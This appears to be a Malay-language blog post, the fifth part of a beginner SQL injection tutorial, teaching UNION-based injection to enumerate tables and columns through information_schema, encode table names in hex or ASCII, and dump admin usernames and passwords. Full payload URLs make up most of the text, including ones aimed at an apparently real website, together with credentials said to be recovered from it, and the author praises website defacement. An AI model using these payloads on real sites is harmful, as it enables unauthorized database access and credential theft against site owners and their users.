Asas SQLi - Tutorial S5


kita baca point-point bagi siri kelima ini dahulu

Kumpul Data

- Jadi sekarang anda sudah dapat lihat table yang ada dalam laman tersebut , langkah terakhir ini ialah untuk mengumpul Data daripada table.
- Jadi , perkara asas yang biasanya penggodam lakukan ialah mencari table yang mengandungi maklumat Admin / users bagi membolehkannya mendapatkan maklumat login ( email, username, password dll)
- Gunakan arahan group_concat(table_name) pada no ajaib bagi mengeluarkan maklumat dalam table tersebut.

- Contohnya :
  http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables--

- Dan gantikan +from+information_schema.tables+where+table_schema=database()-- kat belakang.

Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

- Kali ini anda akan perhatikan folder table yang mengandungi data didalamnya. Contohnya anda lihat table yang bernama " Admin " , sila convert table name " Admin " tersebut kepada HEXADECIMEL
- Setelah anda convert , sila masukkan arahan group_concat(column_name) kat no ajaib tadi ( 2 ).

Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.tables+where+table_schema=database()--

 - Dan kemudian tambahkan arahan  +from+information_schema.columns+where+table_name=0xHEXADECIMEL-- . Contohnya table name tadi " Admin " , setelah di convert menjadi 41444D494E . Maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--

- Sekarang kita berada dalam folder ADMIN , jadi kita akan keluarkan data melalui arahan concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") . Contohnya table yang ada ialah "username" dan "password" , maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+information_schema.columns+where+table_name=0x41444D494E--

- Kemudian gantikan arahan belakang kepada +from+Admin-- bagi menjayakan arahan untuk mendapatkan maklumat daripada table ADMIN. Maka arahan akan seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+Admin--

- Dan sekarang anda akan lihat data "username" dan "password" seperti arahan yang kita jalankan.
- Password berkemungkinan besar dalam bentuk hash , jadi anda perlu decrypt untuk mendapatkan plain text nya seterusnya mendapatkan login page admin tersebut.
------------------------------------------------------------------


Biaklah, berbalik pada tutor pada siri yang lepas, setelah diteliti kita dapati table yang kita perlukan bernama tbladmin. Apa yang perlu kita buat lepas ni ialah kita perlu tukarkan perkataan atau nama table tadi kepada nilai HEX (hexadecimal) ataupon nilai ASCII (sebutannya ‘ass-key’... ops...).

Apakah dia ASCII ?
Rujuk disini;  http://en.wikipedia.org/
Sekarang kita dapatkan nilai ASCII atau HEX bagi ‘tbladmin’ dilaman dibawah;

atau

Masukkan kotak pertama dengan nama table, dalam tutor ini kita ambil tbladmin untuk tukar ke ASCII atau ke HEX. Masukkan perkataan seperti dibawah untuk tukar.
tbladmin

setelah dapat ASCII bagi nama table, apa yang kita perlu buat selepas itu ialah buangkan karakter " & # "sekiranaya ada dan tambah tanda koma "," diantara setiap nombor sekiranya tiada .
Ia akan kelihatan seperti ini bagi ASCII:
116,98,108,97,100,109,105,110
dan begini kalau HEX:
74626C61646D696E
Seterusnya tukarkan beberapa perkataan yang terdapat di URL, tukar "table_name" kepada "column_name" dan tukar "information_schema.tables" kepada "information_schema.columns” dan tambahkan diakhir dengan "where table_name=char(nilai ASCII)--” ataupon "where table_name=0x(nilai HEX)--
 
dimana dalam kes ini kita masukkan (nilai ASCII) itu dengan (116,98,108,97,100,109,105,110)-- atau nilai HEX dengan 74626C61646D696E--
URL kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
atau,
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=0x74626C61646D696--
Laman kita akan kelihatan seperti ini:


Yay, sekarang kita dah nampak nama-nama column yang menyimpan data. Langkah seterusnya kita cari column mana yang mungkin menyimpan data yang kita perlukan. Dalam kes ini kita cari column yang bernama  “username" dan "password" atau sesuatu yang seakannya. Nama column mungkin berbeza mengikut cita rasa admin laman tersebut, jadi kena bijak buat pilihan. Bagi kes dalam tutor ini kita dapat senang jer iaitu "username" dan "password".

Lepas dah dapat tengok nama-nama column ni, kita perlu ubah URL kita lagi sekali. Kali ini, kita buang semua selepas nombor column terakhir – dalam kes ini ia nombor 11 (rujuk tutor sebelum ini macam mana kita dapat) dan tambahkan "from tbladmin" diakhir URL dan gantikan "column_name" dengan "concat(username,0x3a,password)”.
0x3a
ialah nilai ASCII bagi tanda “ : ” . ia digunakan untuk memisahkan username dan password .

URL kita kelihatan begini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Maka, akan terpaparlah data seperti di bawah:

Kita Berjaya ! Kita dah dapat username  ishir dan password ishir123
kadang-kadang password di enkrip dengan Hashes. Gunakan HASH Detector dibawah untuk dekrip password. Boleh jugak guna HASH decryptor yang online jika anda mahu.

Download HASH Decryptor

Hah, dah la, dah habis dah tutor ni ! janjang pon dah penat. Hehe gurau jer. 
Alhamdulillah selesai jugak tutorial Asas SQLi ni. kepada korang semua, Selamat mencuba semua yer. Lagi sekali Kredit kepada KenaHack [KH] dan Komuniti Hack diatas tutorial ini. Janjang mohon maaf kalau ade yang tak jelas dalam siri Asas SQLi ni ataupon Janjang tak dapat nak jawap soalan2 korang dalam siri2 lepas. Nak buat camne, penulis ni p on noob jer. Lain la Mr.Hac dengan Analyzer, siap dah deface website  orang lagi.. power tol diorangkan. Kalau tanyer diorang berdua tu mesti dapat jawab punyer la.

Harap-harap ni bukan entri terakhir Janjang, insyaAllah kita jumpe lagi dalam entri akan datang..
Powered by Blogger.